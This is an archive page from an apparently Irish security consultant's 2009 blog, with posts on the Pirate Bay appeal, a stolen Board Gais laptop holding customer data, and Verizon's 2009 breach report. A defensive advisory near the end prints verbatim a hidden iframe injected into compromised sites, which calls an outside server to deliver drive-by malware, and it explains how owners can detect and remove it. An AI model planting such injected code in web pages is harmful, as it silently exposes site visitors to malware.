Archive for June, 2009
June 27th, 2009 | 
Author: The Pirate Bay a Swedish website located in Stockholm, believed to be one of the worlds largest sources for finding pirated software, pirated movies, pirated music etc… This website was initially established in November 2003 by the Swedish anti-copyright organization Piratbyrån (The Piracy Bureau), it had been operating as a separate organization since October 2004. The Pirate Bay has been involved in a number of lawsuits, both as the plaintiff and as the defendant.
At the initial trial on the 17th of April 2009 four members of The Pirate Bay were found guilty of assistance to copyright infringement and sentenced to one year in prison and payment of a fine of 30 million kronor (about 2,684,000 euro)to a handful of entertainment companies, including Sony Music Entertainment, Warner Bros, EMI and Columbia Pictures.
During the trial the prosecution attempted to show the Pirate Bay as an immensely profitable business that made its money helping others violate copyright law. The defence attempted to show the Pirate Bay as nothing more than a search engine, no different from Google. But as we all know Google is a search engine that is free for us to use when searching for information on the web, where The Pirate Bay was a website for finding illegal software and the use was not entirely free, so there is comparison in The Pirate Bay and a search engine like Google. After the trial it was claimed that the judge was involved in pro-copyright lobby groups. Because of these connections the lawyers of the Pirate Bay defendants called for a retrial, arguing that the judge was not as objective as he should have been.
On the 23 of June 2009 A Swedish appellate court ruled Thursday there would be no retrial in the Pirate Bay case. The Appeal Court ruled that the judge in the initial trial was not bias. Although he was indeed a member of organizations that preserve the interests of copyright holders, this had not influenced his judgment.
Despite the convictions and court action The Pirate Bay, with more than 30 million users, keeps operating as usual. So will there be further action to take this website off line or what is the next step
Posted in 
Encryption does not stop a hacker from gaining access to data stored on computers; it only makes it difficult and time consuming for the hacker to gain access to the data.
From reading the article in the Irish Times “Stolen Laptops from Board Gais” I have the following concerns because the picture painted by this story does not look right.
“Stolen laptop containing the account details of 75,000 customers” Why would a single laptop contain the details of so many customers? In all large organisations customer data is kept in databases located in secure data centre. So there is some thing wrong if the confidential details of 75,000 customers were stored on a single laptop. Any experienced IT Security person reading this article in the Irish Times would question the policies and procedures for data management at Board Gais.
“The affected customers have been warned to monitor their bank accounts for suspicious transactions”, So not only do we have customer details gone missing but we also have bank account details of the customers.
What is this type of data doing on a laptop?
This type of date should never be stored on a laptop; it should be stored on a secure database located in a secure data centre.
The Question that I have not heard any news person ask is why was the details of 75,000 customer stored on a single laptop?
Does this mean that other laptop in Board Gais also contain this type of info?
Does Board Gais not have a secure data centre for storing this type of data?
“Mr Bunworth said that while the machine was not encrypted, the data saved on it could only be accessed using a username and password. “ To an experienced hacker cracking passwords is normally not difficulty; even for a novice there are so many tools freely available on the internet to crack passwords. The day of usernames and passwords been considered as strong security are long gone and this have been replaced with two-factor authentication.
The article in the Irish Times that I an referring to is :
http://www.irishtimes.com/newspaper/breaking/2009/0618/breaking29.html
 Verizon Business 2009 Data Breach Investigations Report (April 14 & 16, 2009)
According to Verizon Business 2009 Data Breach Investigations Report,the number of records compromised in the breaches it examined in the last year is greater than the totals of the four previous years combined. Of those breaches detailed in the report, 90 percent have ties to organized crime rings. Only one third of the incidents Verizon investigated were publicly disclosed. Attacks now target personal identification numbers (PINs) along with other payment card account information. Eighty seven percent of the security breaches occurred on systems that were not compliant with the Payment Card Industry Data Security Standard (PCI DSS) at the time of the incident.
 Approximately 75 percent of the breaches investigated were launched from external sources.
Internet Storm Center: http://isc.sans.org/diary.html?storyid=6202
http://www.securityfocus.com/brief/947
http://fcw.com/Articles/2009/04/16/Verizon-Organized-crime-behind-data-breaches.aspx
http://www.theregister.co.uk/2009/04/16/pin_security_breach_survey/
http://www.washingtonpost.com/wp-dyn/content/article/2009/04/15/AR2009041501196_pf.html
http://blog.wired.com/27bstroke6/2009/04/pins.html
http://www.verizonbusiness.com/resources/security/reports/2009_databreach_rp.pdf
At “Security I Trust” we have noticed a large increase in the number of Irish websites that are being compromise by hackers. In the majority of cases the hackers have only inserted code into the home page of a website. Many Irish website owners have been completely unaware that their website has been compromised and they only found out when their PC was already affected.
The following code is appearing recently on the homepage of many Irish website:
<html><body><iframe src=”http://tvnameshop.cn:8080/ts/in.cgi?pepsi19? width=12 height=12 style=”visibility: hidden”></iframe></body></html>
The above iframes URL is using a “.cn” extension to make you think that it is a Chinese hacking group but from our investigation we have traced this link to a server located in Germany. This German server appears to reroute the connection to a server located in the Czech Republic.
What can website owners do?
If they are concerned about their website being a victim they can open their web pages in a web browser and search for any iframes code, tvnameshop.cn, or fuckingl33t.eu reference. If you do not understand web code you are advised to ask a web programmer to assist you. To repair your website you need to remove the code that the hackers have added to your website.
So what are these hackers doing?
When your customer come to your website it will appear normal, but in the background when your homepage loads in the browser of the person viewing your website the hacker’s hidden code will also make a connection out to the hackers server and run several hidden script against the users PC. These hidden scripts could be used to steal information from the users PC or even install malware or other tools on your PC. The primary danger for the website owner is that it will appear as if his website was responsible for the attack against the user.
Niall O’Farrell
Managing Director
www.securityitrust.com